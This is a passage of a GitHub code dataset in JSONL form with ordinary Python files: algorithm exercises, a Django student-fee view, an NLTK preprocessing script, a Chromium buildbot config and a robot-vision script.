np.polyfit(A[:,0],A[:,1],n)\r\n C = np.polyval(B, A[:,0])\r\n D = np.linalg.norm(A[:,1] - C)\r\n x = [n,D]\r\n if n==0:\r\n y = x\r\n elif y[1] >= x[1]:\r\n z = x[0]\r\n D = np.polyfit(A[:,0],A[:,1],z)\r\n print('Coefficients: ',D) \r\nprint(\"nx2 Matrix is needed;hence,the number of rows is needed\")\r\nrows = int(input(\"Enter the number of rows:\")) \r\ncolumns =2 \r\nprint(\"Please enter the values of the elements of the matrix:\")\r\nprint(\"NOTE: Use space when inputting values EX. 1 2 3 4\")\r\nVALUES = list(map(int, input().split())) \r\nMX = np.array(VALUES).reshape(rows, columns)\r\nprint(\"ANSWER:\")\r\nPROBLEM3(MX)\r\n","repo_name":"ralphy1003/MP_PROBLEM3-PYTHON","sub_path":"PROBLEM3.py","file_name":"PROBLEM3.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27752387678","text":"import sys\r\nsys.setrecursionlimit(10000)\r\ninput = sys.stdin.readline\r\n\r\ndef dfs(graph, v, visited):\r\n visited.add(v)\r\n for i in graph[v]:\r\n if i not in visited:\r\n dfs(graph, i, visited)\r\n stack.append(v)\r\n\r\ndef dfs2(graph2, v, visited):\r\n visited.add(v)\r\n tmp.append(v)\r\n for i in graph2[v]:\r\n if i not in visited:\r\n dfs2(graph2, i, visited)\r\n\r\n\r\nV, E = map(int, input().split())\r\n\r\ngraph = [[] for _ in range(V+1)]\r\ngraph2 = [[] for _ in range(V+1)]\r\nstack = []\r\nfor _ in range(E):\r\n a, b = map(int, input().split())\r\n graph[a].append(b)\r\n graph2[b].append(a)\r\nvisited = set()\r\nfor k in range(1,V+1):\r\n if k not in visited:\r\n dfs(graph, k, visited)\r\n# print(stack)\r\n\r\nans = []\r\nvisited = set()\r\nwhile stack:\r\n k = stack.pop()\r\n if k in visited:\r\n continue\r\n tmp = []\r\n dfs2(graph2, k, visited)\r\n ans.append(sorted(tmp))\r\nprint(len(ans))\r\nfor i in sorted(ans):\r\n print(*i,-1)","repo_name":"nube-net/baekjoon-nube-net-gytjdttop-","sub_path":"백준/Platinum/2150. Strongly Connected Component/Strongly Connected Component.py","file_name":"Strongly Connected Component.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"8809969704","text":"'''\n계수정렬 O(N+K)\n1. N이 100만아래면 용이하게 사용가능\n2. 제일큰수와 가장 작은수가 차이가 작으면 좋다.\n-> 배열을 N까지 선언하고 개수를 세기 때문이다.\n\n동일한 값을 가지는 데이터가 여러개 등장할 때 효과적\nex) 성적 0~100점이면서, 범위가 짧고 동일한 학생많으니까.\n'''\narray = [1,5,2,7,4,10,9,2,1,0,6,8,9,14]\ncount = [0] * ((max(array)+1))\n\nfor i in range(len(array)):\n count[array[i]] += 1\n\n# 1-몇개 2-몇개\nfor i in range(len(count)):\n for j in range(count[i]):\n print(i, end=' ')\n\n\n","repo_name":"Minsik113/Algorithm-practice","sub_path":"[책]이것이코딩테스트다/4_정렬/00_계수.py","file_name":"00_계수.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35224220262","text":"# -*- coding: utf-8 -*-\n\nfrom typing import List\nfrom typing import Optional\n\nfrom veld.core.streamed_variance import StreamedVariance\n\nfrom ._base import VeldCommand\n\n\nclass StandardDeviationCommand(VeldCommand):\n def __init__(self):\n super().__init__(\n name=\"stdev\",\n title=\"Compute the standard deviation of the input stream\",\n extra_sections={\n \"NOTES\": (\n \"1. https://en.wikipedia.org/wiki/Standard_deviation#Uncorrected_sample_standard_deviation\"\n )\n },\n )\n\n def register(self):\n super().register()\n self.add_argument(\n \"-p\",\n \"--population\",\n help=\"Compute the population standard deviation\",\n description=(\n \"By default the Veld stdev command computes an unbiased \"\n \"estimator of the sample standard deviation. If the data \"\n \"stream constitutes the entirety of a finite population, \"\n \"then you can use this flag to compute the uncorrected \"\n \"population standard deviation [1].\"\n ),\n action=\"store_true\",\n )\n\n def handle(self) -> int:\n svs = None # type: Optional[List[StreamedVariance]]\n\n for values in self.default_stream_processor:\n if svs is None:\n svs = [\n StreamedVariance(population=self.args.population)\n for _ in range(len(values))\n ]\n\n for i in range(len(values)):\n svs[i].update(values[i])\n\n svs = [] if svs is None else svs\n variances = [sv.stdev for sv in svs]\n print(self.args.separator.join(map(str, variances)))\n return 0\n","repo_name":"GjjvdBurg/Veld","sub_path":"veld/console/commands/stdev.py","file_name":"stdev.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41544507261","text":"\nimport csv\nimport glob\nimport pandas as pd\nfrom nltk import tokenize, re\nimport data_prep.py\n\ndef sentence2word(inputFile,outputFile):\n\n with open(inputFile) as dataFile:\n sentences = dataFile.read().splitlines()\n\n rows = []\n for sentence in sentences:\n row = []\n row.append(sentence); row.append('Sentence'); rows.append(row)\n row = []\n row.append('BOS'); row.append('BOS'); rows.append(row)\n\n # split sentence into words and punctuations\n words = re.findall(r\"[\\w']+|[().,!?;]\", sentence)\n for word in words:\n row = []\n row.append(word)\n row.append('O')\n rows.append(row)\n row = []\n row.append('EOS'); row.append('EOS'); rows.append(row)\n\n with open(outputFile,'w') as w:\n writer = csv.writer(w)\n writer.writerows(rows)\n print('Done: sentence text to word+\\'O\\' csv')\n \n# write each thread into a line, and merge all files into one file\npath = './data/medhelp_disease/*.txt'\nfiles = glob.glob(path)\nresultList = []\nfor fileName in files:\n with open(fileName) as data:\n sentences = data.read().splitlines()\n\n tempStr = \"\"\n for i in range(0, len(sentences)-1):\n if \"Content:\" in sentences[i]:\n tempStr += sentences[i]\n if \"User0:\" in sentences[i+1]:\n resultList.append(tempStr)\n tempStr = \"\"\n resultList.append(tempStr)\n\nf = open('./data/medhelp_disease_all.txt', 'w')\nf.writelines([\"%s\\n\" % result for result in resultList])\nprint(\"Done\")\n\n# ## split text into sentence by sentence, using NLTK\n# open input file, read all columns, address unexpected letters\nfp = open(\"./data/medhelp_disease_all.txt\")\ndata = fp.read()\n# data = unicode(data, errors='ignore')\n\n# tokenize text into sentences, using nltk\nsentences = tokenize.sent_tokenize(data)\nprint(len(sentences))\n\n# write generated list of strings into txt file\nfile = open('./data/medhelp_disease_sentence.txt', 'w')\nfile.writelines([\"%s\\n\" % sentence for sentence in sentences])\nprint('Done')\n\nif __name__ == \"__main__\":\n # inputFile = './data/all.txt'\n sentenceFile = './data/all_sentence.txt'\n\n # text2sentence(inputFile,sentenceFile)\n # word2id(sentenceFile)\n\n wordFile = './data/all_word.csv'\n # sentence2word(sentenceFile,wordFile)\n\n with open('./data/label_file_1.csv','w') as f:\n writer = csv.writer(f)\n writer.writerows(bioLists)\n","repo_name":"Missymeng/Drug_Repositioning","sub_path":"dataset_prep.py","file_name":"dataset_prep.py","file_ext":"py","file_size_in_byte":2442,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"27353293895","text":"\"\"\"\nThis module contains step definitions for update_student_by_id.feature.\nIt uses the requests package:\nhttp://docs.python-requests.org/\n\"\"\"\nimport requests\nfrom behave import *\n\n# \"Constants\"\nSTUDENT_API = 'http://127.0.0.1:5000/'\n\n\n@when('the update student API is queried with id')\ndef step_impl(context):\n first_row = context.table[0]\n params = {'id': first_row['id'], 'class': first_row['class']}\n context.response = requests.put(STUDENT_API, params=params)\n\n\n@then('the response status code is \"{code:d}\"')\ndef step_impl(context, code):\n assert context.response.status_code == code\n","repo_name":"ketan55patil/student_enrollment_api","sub_path":"features/steps/update_student_by_id.py","file_name":"update_student_by_id.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"18249650456","text":"#!/usr/bin/env python3\nimport numpy as np\nimport cv2\nfrom datetime import datetime\n\n\ndef put_text(image, text):\n font_size = 1.0\n font_type = cv2.FONT_HERSHEY_PLAIN\n font_color = (0xff, 0xf, 0xff)\n cv2.putText(image, text, (460, 15), font_type, font_size, font_color)\n \n\nimage = cv2.imread(\"/tmp/tmp.jpg\")\n\ntnow = datetime.now().strftime('%Y%m%d_%H_%M_%S') # ('%Y%m%d_%H_%M_%S_%f')\nput_text(image, tnow)\ncv2.imshow('test', image)\n\n\nwhile(True):\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\ncv2.destroyAllWindows()\n\nprint(\"Done.\")\n","repo_name":"amiged/THBox","sub_path":"src/put_text.py","file_name":"put_text.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15453325611","text":"from master import master_config\nfrom master.factory import chromium_factory\n\ndefaults = {}\n\nhelper = master_config.Helper(defaults)\nB = helper.Builder\nF = helper.Factory\nS = helper.Scheduler\nT = helper.Triggerable\n\n\ndef win():\n return chromium_factory.ChromiumFactory('src/build', 'win32')\ndef winXpTester():\n return chromium_factory.ChromiumFactory('src/build', 'win32',\n nohooks_on_update=True)\n\nS('win_rel_scheduler', branch='src', treeStableTimer=60)\nT('win_rel_trigger')\n\nchromium_rel_archive = master_config.GetGSUtilUrl('chromium-webrtc',\n 'Win Builder')\ntests = [\n 'webrtc_manual_browser_tests',\n 'webrtc_manual_content_browsertests',\n 'webrtc_content_unittests',\n]\n\ndefaults['category'] = 'win'\n\nB('Win Builder', 'win_rel_factory', scheduler='win_rel_scheduler',\n notify_on_missing=True)\nF('win_rel_factory', win().ChromiumWebRTCFactory(\n slave_type='Builder',\n target='Release',\n options=['--compiler=goma', '--', 'chromium_builder_webrtc'],\n compile_timeout=2400,\n factory_properties={'trigger': 'win_rel_trigger',\n 'build_url': chromium_rel_archive,}))\n\nB('WinXP Tester', 'win_xp_tester_factory', scheduler='win_rel_trigger')\nF('win_xp_tester_factory', winXpTester().ChromiumWebRTCFactory(\n slave_type='Tester',\n build_url=chromium_rel_archive,\n tests=tests,\n factory_properties={\n 'show_perf_results': True,\n 'halt_on_missing_build': True,\n 'perf_id': 'chromium-webrtc-rel-xp',\n 'process_dumps': True,\n 'start_crash_handler': True,\n }))\n\nB('Win7 Tester', 'win_7_tester_factory', scheduler='win_rel_trigger')\nF('win_7_tester_factory', win().ChromiumWebRTCFactory(\n slave_type='Tester',\n build_url=chromium_rel_archive,\n tests=tests,\n factory_properties={\n 'show_perf_results': True,\n 'halt_on_missing_build': True,\n 'perf_id': 'chromium-webrtc-rel-7',\n 'process_dumps': True,\n 'start_crash_handler': True,\n }))\n\nB('Win8 Tester', 'win_8_tester_factory', scheduler='win_rel_trigger')\nF('win_8_tester_factory', win().ChromiumWebRTCFactory(\n slave_type='Tester',\n build_url=chromium_rel_archive,\n tests=tests,\n factory_properties={\n 'show_perf_results': True,\n 'halt_on_missing_build': True,\n 'perf_id': 'chromium-webrtc-rel-win8',\n 'process_dumps': True,\n 'start_crash_handler': True,\n }))\n\n\ndef Update(config, active_master, c):\n helper.Update(c)\n","repo_name":"houseoflifeproperty/bitpop","sub_path":"build/masters/master.chromium.webrtc/master_win_cfg.py","file_name":"master_win_cfg.py","file_ext":"py","file_size_in_byte":2549,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"5769309378","text":"import json\r\nfrom django.shortcuts import render,redirect\r\nfrom .models import Stud_PD,Stud_Admn,Fee_Str,Fee_Record,Stud_Fees\r\nfrom django.shortcuts import get_list_or_404,get_object_or_404\r\nfrom django.contrib.auth.decorators import login_required\r\nfrom . import forms\r\nfrom django.http import HttpResponse\r\n\r\n@login_required(login_url=\"/accounts/login/\")\r\ndef stud_pd_entry(request):\r\n\r\n if request.is_ajax():\r\n stud_pds = Stud_PD.objects.all()\r\n stud_admns = Stud_Admn.objects.all()\r\n usnList = []\r\n for s in stud_pds:\r\n usnList.append(s.USN)\r\n adNoList = []\r\n for a in stud_admns:\r\n adNoList.append(a.Adm_No)\r\n data = [usnList, adNoList]\r\n data = json.dumps(data)\r\n return HttpResponse(data, content_type='application/json')\r\n\r\n if request.method == 'POST':\r\n form1 = forms.create_stud_pd(request.POST)\r\n form2 = forms.create_stud_admn(request.POST)\r\n if form1.is_valid()&form2.is_valid():\r\n instance1 = form1.save(commit=False)\r\n instance1.Added_by = request.user\r\n instance1.save()\r\n instance2 = form2.save(commit=False)\r\n try:\r\n fee_foreign = Fee_Str.objects.get(Course=request.POST['Course'],Branch=request.POST['Branch'],Adm_Year=request.POST['Adm_Year'],Adm_type=request.POST['Adm_Type'],Quota=request.POST['Quota']) \r\n except:\r\n fee_foreign = Fee_Str.objects.get(Fid=1)\r\n else:\r\n instance2.Fid = fee_foreign \r\n instance2.Sid = instance1 \r\n instance2.save()\r\n instance3 = Stud_Fees.objects.create(Adm_No_S=instance2,Total=fee_foreign.Total,Due=fee_foreign.Total)\r\n instance3.save()\r\n return redirect('details:list')\r\n else: \r\n form1 = forms.create_stud_pd()\r\n form2 = forms.create_stud_admn()\r\n return render(request, 'entry/createstudpd.html',{'form1':form1,'form2':form2})\r\n\r\n@login_required(login_url=\"/accounts/login/\")\r\ndef update_stud_fee(request,usn): \r\n\r\n if request.is_ajax():\r\n stud_pd = Stud_PD.objects.get(USN=usn)\r\n stud_ad = Stud_Admn.objects.get(Sid=stud_pd.Sid)\r\n fee_str = Fee_Str.objects.get(Fid=str(stud_ad.Fid))\r\n stud_fee = Stud_Fees.objects.get(Adm_No_S=stud_ad.Adm_No)\r\n data = json.dumps(stud_fee.Due)\r\n return HttpResponse(data, content_type='application/json')\r\n\r\n if request.method == 'POST':\r\n stud_pd = Stud_PD.objects.get(USN=usn)\r\n stud_ad = Stud_Admn.objects.get(Sid=stud_pd.Sid)\r\n fee_str = Fee_Str.objects.get(Fid=str(stud_ad.Fid))\r\n stud_fee = Stud_Fees.objects.get(Adm_No_S=stud_ad.Adm_No)\r\n try:\r\n amt=int(request.POST.get('amt',0))\r\n except:\r\n amt=0\r\n if(amt):\r\n if amt>0:\r\n if amt<=stud_fee.Due:\r\n if(amt):\r\n if stud_fee.Apti_1_Paid!=fee_str.Apti_1:\r\n if amt>=fee_str.Apti_1:\r\n stud_fee.Apti_1_Paid=fee_str.Apti_1\r\n amt=amt-fee_str.Apti_1\r\n elif (amt+stud_fee.Apti_1_Paid)>=fee_str.Apti_1:\r\n amt=amt+stud_fee.Apti_1_Paid-fee_str.Apti_1\r\n stud_fee.Apti_1_Paid=fee_str.Apti_1\r\n else:\r\n stud_fee.Apti_1_Paid+=amt\r\n amt=0 \r\n \r\n if(amt):\r\n if stud_fee.Tech_2_Paid!=fee_str.Tech_2:\r\n if amt>=fee_str.Tech_2:\r\n stud_fee.Tech_2_Paid=fee_str.Tech_2\r\n amt=amt-fee_str.Tech_2\r\n elif (amt+stud_fee.Tech_2_Paid)>=fee_str.Tech_2:\r\n amt=amt+stud_fee.Tech_2_Paid-fee_str.Tech_2\r\n stud_fee.Tech_2_Paid=fee_str.Tech_2\r\n else :\r\n stud_fee.Tech_2_Paid+=amt\r\n amt=0\r\n\r\n if(amt):\r\n if stud_fee.Book_3_Paid!=fee_str.Book_3:\r\n if amt>=fee_str.Book_3:\r\n stud_fee.Book_3_Paid=fee_str.Book_3\r\n amt=amt-fee_str.Book_3\r\n elif (amt+stud_fee.Book_3_Paid)>=fee_str.Book_3:\r\n amt=amt+stud_fee.Book_3_Paid-fee_str.Book_3\r\n stud_fee.Book_3_Paid=fee_str.Book_3\r\n else:\r\n stud_fee.Book_3_Paid+=amt\r\n amt=0\r\n\r\n if(amt):\r\n if stud_fee.IndP_4_Paid!=fee_str.IndP_4:\r\n if amt>=fee_str.IndP_4:\r\n stud_fee.IndP_4_Paid=fee_str.IndP_4\r\n amt=amt-fee_str.IndP_4\r\n elif (amt+stud_fee.IndP_4_Paid)>=fee_str.IndP_4:\r\n amt=amt+stud_fee.IndP_4_Paid-fee_str.IndP_4\r\n stud_fee.IndP_4_Paid=fee_str.IndP_4\r\n else:\r\n stud_fee.IndP_4_Paid+=amt\r\n amt=0\r\n\r\n if(amt):\r\n if stud_fee.IndV_5_Paid!=fee_str.IndV_5:\r\n if amt>=fee_str.IndV_5:\r\n stud_fee.IndV_5_Paid=fee_str.IndV_5\r\n amt=amt-fee_str.IndV_5\r\n elif (amt+stud_fee.IndV_5_Paid)>=fee_str.IndV_5:\r\n amt=amt+stud_fee.IndV_5_Paid-fee_str.IndV_5\r\n stud_fee.IndV_5_Paid=fee_str.IndV_5\r\n else:\r\n stud_fee.IndV_5_Paid+=amt\r\n amt=0\r\n\r\n if(amt):\r\n if stud_fee.Inte_6_Paid!=fee_str.Inte_6:\r\n if amt>=fee_str.Inte_6:\r\n stud_fee.Inte_6_Paid=fee_str.Inte_6\r\n amt=amt-fee_str.Inte_6\r\n elif (amt+stud_fee.Inte_6_Paid)>=fee_str.Inte_6:\r\n amt=amt+stud_fee.Inte_6_Paid-fee_str.Inte_6\r\n stud_fee.Inte_6_Paid=fee_str.Inte_6\r\n else:\r\n stud_fee.Inte_6_Paid+=amt\r\n amt=0\r\n\r\n if(amt):\r\n if stud_fee.Libr_7_Paid!=fee_str.Libr_7:\r\n if amt>=fee_str.Libr_7:\r\n stud_fee.Libr_7_Paid=fee_str.Libr_7\r\n amt=amt-fee_str.Libr_7\r\n elif (amt+stud_fee.Libr_7_Paid)>=fee_str.Libr_7:\r\n amt=amt+stud_fee.Libr_7_Paid-fee_str.Libr_7\r\n stud_fee.Libr_7_Paid=fee_str.Libr_7\r\n else:\r\n stud_fee.Libr_7_Paid+=amt\r\n amt=0\r\n\r\n if(amt):\r\n if stud_fee.Semi_8_Paid!=fee_str.Semi_8:\r\n if amt>=fee_str.Semi_8:\r\n stud_fee.Semi_8_Paid=fee_str.Semi_8\r\n amt=amt-fee_str.Semi_8\r\n elif (amt+stud_fee.Semi_8_Paid)>=fee_str.Semi_8:\r\n amt=amt+stud_fee.Semi_8_Paid-fee_str.Semi_8\r\n stud_fee.Semi_8_Paid=fee_str.Semi_8\r\n else:\r\n stud_fee.Semi_8_Paid+=amt\r\n amt=0\r\n\r\n if(amt):\r\n if stud_fee.Soft_9_Paid!=fee_str.Soft_9:\r\n if amt>=fee_str.Soft_9:\r\n stud_fee.Soft_9_Paid=fee_str.Soft_9\r\n amt=amt-fee_str.Soft_9\r\n elif (amt+stud_fee.Soft_9_Paid)>=fee_str.Soft_9:\r\n amt=amt+stud_fee.Soft_9_Paid-fee_str.Soft_9\r\n stud_fee.Soft_9_Paid=fee_str.Soft_9\r\n else:\r\n stud_fee.Soft_9_Paid+=amt\r\n amt=0\r\n\r\n if(amt):\r\n if stud_fee.Conf_10_Paid!=fee_str.Conf_10:\r\n if amt>=fee_str.Conf_10:\r\n stud_fee.Conf_10_Paid=fee_str.Conf_10\r\n amt=amt-fee_str.Conf_10\r\n elif (amt+stud_fee.Conf_10_Paid)>=fee_str.Conf_10:\r\n amt=amt+stud_fee.Conf_10_Paid-fee_str.Conf_10\r\n stud_fee.Conf_10_Paid=fee_str.Conf_10\r\n else:\r\n stud_fee.Conf_10_Paid+=amt\r\n amt=0\r\n\r\n if(amt):\r\n if stud_fee.Subj_11_Paid!=fee_str.Subj_11:\r\n if amt>=fee_str.Subj_11:\r\n stud_fee.Subj_11_Paid=fee_str.Subj_11\r\n amt=amt-fee_str.Subj_11\r\n elif (amt+stud_fee.Subj_11_Paid)>=fee_str.Subj_11:\r\n amt=amt+stud_fee.Subj_11_Paid-fee_str.Subj_11\r\n stud_fee.Subj_11_Paid=fee_str.Subj_11\r\n else:\r\n stud_fee.Subj_11_Paid+=amt\r\n amt=0\r\n\r\n if(amt):\r\n if stud_fee.Spor_12_Paid!=fee_str.Spor_12:\r\n if amt>=fee_str.Spor_12:\r\n stud_fee.Spor_12_Paid=fee_str.Spor_12\r\n amt=amt-fee_str.Spor_12\r\n elif (amt+stud_fee.Spor_12_Paid)>=fee_str.Spor_12:\r\n amt=amt+stud_fee.Spor_12_Paid-fee_str.Spor_12\r\n stud_fee.Spor_12_Paid=fee_str.Spor_12\r\n else:\r\n stud_fee.Spor_12_Paid+=amt\r\n amt=0\r\n\r\n if(amt):\r\n if stud_fee.Tran_13_Paid!=fee_str.Tran_13:\r\n if amt>=fee_str.Tran_13:\r\n stud_fee.Tran_13_Paid=fee_str.Tran_13\r\n amt=amt-fee_str.Tran_13\r\n elif (amt+stud_fee.Tran_13_Paid)>=fee_str.Tran_13:\r\n amt=amt+stud_fee.Tran_13_Paid-fee_str.Tran_13\r\n stud_fee.Tran_13_Paid=fee_str.Tran_13\r\n else:\r\n stud_fee.Tran_13_Paid+=amt\r\n amt=0\r\n\r\n if(amt):\r\n if stud_fee.Tuti_14_Paid!=fee_str.Tuti_14:\r\n if amt>=fee_str.Tuti_14:\r\n stud_fee.Tuti_14_Paid=fee_str.Tuti_14\r\n amt=amt-fee_str.Tuti_14\r\n elif (amt+stud_fee.Tuti_14_Paid)>=fee_str.Tuti_14:\r\n amt=amt+stud_fee.Tuti_14_Paid-fee_str.Tuti_14\r\n stud_fee.Tuti_14_Paid=fee_str.Tuti_14\r\n else:\r\n stud_fee.Tuti_14_Paid+=amt\r\n amt=0\r\n\r\n if(amt):\r\n if stud_fee.Volu_15_Paid!=fee_str.Volu_15:\r\n if amt>=fee_str.Volu_15:\r\n stud_fee.Volu_15_Paid=fee_str.Volu_15\r\n amt=amt-fee_str.Volu_15\r\n elif (amt+stud_fee.Volu_15_Paid)>=fee_str.Volu_15:\r\n amt=amt+stud_fee.Volu_15_Paid-fee_str.Volu_15\r\n stud_fee.Volu_15_Paid=fee_str.Volu_15\r\n else:\r\n stud_fee.Volu_15_Paid+=amt\r\n amt=0\r\n \r\n stud_fee.Paid=stud_fee.Apti_1_Paid+stud_fee.Tech_2_Paid+stud_fee.Book_3_Paid+stud_fee.IndP_4_Paid+stud_fee.IndV_5_Paid+stud_fee.Inte_6_Paid+stud_fee.Libr_7_Paid+stud_fee.Semi_8_Paid+stud_fee.Soft_9_Paid+stud_fee.Conf_10_Paid+stud_fee.Subj_11_Paid+stud_fee.Spor_12_Paid+stud_fee.Tran_13_Paid+stud_fee.Tuti_14_Paid+stud_fee.Volu_15_Paid\r\n due=stud_fee.Due\r\n stud_fee.Due=stud_fee.Total-stud_fee.Paid\r\n due-=stud_fee.Due\r\n stud_fee.save()\r\n\r\n if due:\r\n fee_record = Fee_Record.objects.create(Stud_Fee_ID=stud_fee,Fee_Paid=due,Added_by=request.user)\r\n fee_record.save() \r\n \r\n else: \r\n \r\n paid1=request.POST.get('paid1',False)\r\n if paid1:\r\n stud_fee.Apti_1_Paid=fee_str.Apti_1\r\n paid2=request.POST.get('paid2',False)\r\n if paid2:\r\n stud_fee.Tech_2_Paid=fee_str.Tech_2\r\n paid3=request.POST.get('paid3',False)\r\n if paid3:\r\n stud_fee.Book_3_Paid=fee_str.Book_3\r\n paid4=request.POST.get('paid4',False)\r\n if paid4:\r\n stud_fee.IndP_4_Paid=fee_str.IndP_4\r\n paid5=request.POST.get('paid5',False)\r\n if paid5:\r\n stud_fee.IndV_5_Paid=fee_str.IndV_5\r\n paid6=request.POST.get('paid6',False)\r\n if paid6:\r\n stud_fee.Inte_6_Paid=fee_str.Inte_6\r\n paid7=request.POST.get('paid7',False)\r\n if paid7:\r\n stud_fee.Libr_7_Paid=fee_str.Libr_7\r\n paid8=request.POST.get('paid8',False)\r\n if paid8:\r\n stud_fee.Semi_8_Paid=fee_str.Semi_8\r\n paid9=request.POST.get('paid9',False)\r\n if paid9:\r\n stud_fee.Soft_9_Paid=fee_str.Soft_9\r\n paid10=request.POST.get('paid10',False)\r\n if paid10:\r\n stud_fee.Conf_10_Paid=fee_str.Conf_10\r\n paid11=request.POST.get('paid11',False)\r\n if paid11:\r\n stud_fee.Subj_11_Paid=fee_str.Subj_11\r\n paid12=request.POST.get('paid12',False)\r\n if paid12:\r\n stud_fee.Spor_12_Paid=fee_str.Spor_12\r\n paid13=request.POST.get('paid13',False)\r\n if paid13:\r\n stud_fee.Tran_13_Paid=fee_str.Tran_13\r\n paid14=request.POST.get('paid14',False)\r\n if paid14:\r\n stud_fee.Tuti_14_Paid=fee_str.Tuti_14\r\n paid15=request.POST.get('paid15',False)\r\n if paid15:\r\n stud_fee.Volu_15_Paid=fee_str.Volu_15\r\n \r\n stud_fee.Paid=stud_fee.Apti_1_Paid+stud_fee.Tech_2_Paid+stud_fee.Book_3_Paid+stud_fee.IndP_4_Paid+stud_fee.IndV_5_Paid+stud_fee.Inte_6_Paid+stud_fee.Libr_7_Paid+stud_fee.Semi_8_Paid+stud_fee.Soft_9_Paid+stud_fee.Conf_10_Paid+stud_fee.Subj_11_Paid+stud_fee.Spor_12_Paid+stud_fee.Tran_13_Paid+stud_fee.Tuti_14_Paid+stud_fee.Volu_15_Paid\r\n due=stud_fee.Due\r\n stud_fee.Due=stud_fee.Total-stud_fee.Paid\r\n due-=stud_fee.Due\r\n stud_fee.save()\r\n if due:\r\n fee_record = Fee_Record.objects.create(Stud_Fee_ID=stud_fee,Fee_Paid=due,Added_by=request.user)\r\n fee_record.save()\r\n\r\n \r\n else: \r\n stud_pd = Stud_PD.objects.get(USN=usn)\r\n stud_ad = Stud_Admn.objects.get(Sid=stud_pd.Sid)\r\n fee_str = Fee_Str.objects.get(Fid=str(stud_ad.Fid))\r\n stud_fee = Stud_Fees.objects.get(Adm_No_S=stud_ad.Adm_No)\r\n fee={\r\n 'fee1':fee_str.Apti_1-stud_fee.Apti_1_Paid,\r\n 'fee2':fee_str.Tech_2-stud_fee.Tech_2_Paid,\r\n 'fee3':fee_str.Book_3-stud_fee.Book_3_Paid,\r\n 'fee4':fee_str.IndP_4-stud_fee.IndP_4_Paid,\r\n 'fee5':fee_str.IndV_5-stud_fee.IndV_5_Paid,\r\n 'fee6':fee_str.Inte_6-stud_fee.Inte_6_Paid,\r\n 'fee7':fee_str.Libr_7-stud_fee.Libr_7_Paid,\r\n 'fee8':fee_str.Semi_8-stud_fee.Semi_8_Paid,\r\n 'fee9':fee_str.Soft_9-stud_fee.Soft_9_Paid,\r\n 'fee10':fee_str.Conf_10-stud_fee.Conf_10_Paid,\r\n 'fee11':fee_str.Subj_11-stud_fee.Subj_11_Paid,\r\n 'fee12':fee_str.Spor_12-stud_fee.Spor_12_Paid,\r\n 'fee13':fee_str.Tran_13-stud_fee.Tran_13_Paid,\r\n 'fee14':fee_str.Tuti_14-stud_fee.Tuti_14_Paid,\r\n 'fee15':fee_str.Volu_15-stud_fee.Volu_15_Paid,\r\n \r\n }\r\n\r\n return render(request, 'entry/updatestudfee.html',{'stud_ad':stud_ad,'fee_str':fee_str,'stud_pd':stud_pd,'stud_fee':stud_fee,'fee':fee})\r\n\r\n\r\n@login_required(login_url=\"/accounts/login/\")\r\ndef delete_stud_pd(request,usn):\r\n stud_pd=Stud_PD.objects.get(USN=usn)\r\n if request.method==\"POST\":\r\n stud_pd.delete()\r\n return redirect('details:list')\r\n else:\r\n return render(request,'entry/deletestudpd.html',{'stud_pd':stud_pd})\r\n","repo_name":"prajwalrajbr/updatedstudfeemgmt","sub_path":"entry/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":17505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32466265666","text":"from networktables import NetworkTables\nfrom pipeline import ContourPipeline\nfrom picamera.array import PiRGBArray\nfrom picamera import PiCamera\nfrom datetime import datetime\nimport time\nimport cv2\nimport math\n\nNetworkTables.initialize(server='10.2.79.2')\nprint('Waiting to connect...')\nwhile NetworkTables.isConnected() is False:\n time.sleep(0.1)\n\nnt = NetworkTables.getTable(\"Gear\")\n# imageWidth = 1280\n\n\n# def getDFromW(width):\n# return 7362.30054*(math.pow(float(width), -1.186536))\n\n\n# def getDFromH(height):\n# return 9963.977172*(math.pow(float(height), -1.072971))\n\n\n# def getDFromWt(widthTotal):\n# return 5745.771277*(math.pow(float(widthTotal), -0.895025))\n\n\nstart_time = datetime.now()\n\n\n# def millis():\n# dt = datetime.now() - start_time\n# ms = (dt.days * 24 * 60 * 60 + dt.seconds) * 1000 + dt.microseconds / 1000.0\n# return ms\n\n\nvis = ContourPipeline()\ncamera = PiCamera()\nwhile True:\n imgArray = PiRGBArray(camera, size=(1280, 720))\n camera.resolution = (1280, 720)\n camera.capture(imgArray, format=\"bgr\", use_video_port=True)\n img = imgArray.array\n contours = vis.process(img)\n # Checking if 2 contours exist\n if 1 < len(contours):\n # Creating bounding rectangles around each contour\n rect1 = cv2.boundingRect(contours[0])\n rect2 = cv2.boundingRect(contours[1])\n # creating class object to hold values for first contour\n\n class rectObj1:\n topY = rect1[1]\n botY = (rect1[1] - rect1[3])\n leftX = rect1[0]\n rightX = rect1[0] + rect1[2]\n # top left point\n pt1 = (leftX, topY)\n # bottom right point\n pt2 = (rightX, botY)\n # width and height\n w = rect1[2]\n h = rect1[3]\n # creating class object to hold values for second contour\n\n class rectObj2:\n topY = rect2[1]\n botY = (rect2[1] - rect2[3])\n leftX = rect2[0]\n rightX = rect2[0] + rect2[2]\n # top left point\n pt1 = (leftX, topY)\n # bottom right point\n pt2 = (rightX, botY)\n # width and height\n w = rect2[2]\n h = rect2[3]\n # establishing which rectangle is above the other\n if(rectObj1.topY > rectObj2.topY):\n topRect = rectObj1\n botRect = rectObj2\n else:\n topRect = rectObj2\n botRect = rectObj1\n # printing out values\n print('Top Rectangle Height: ' + 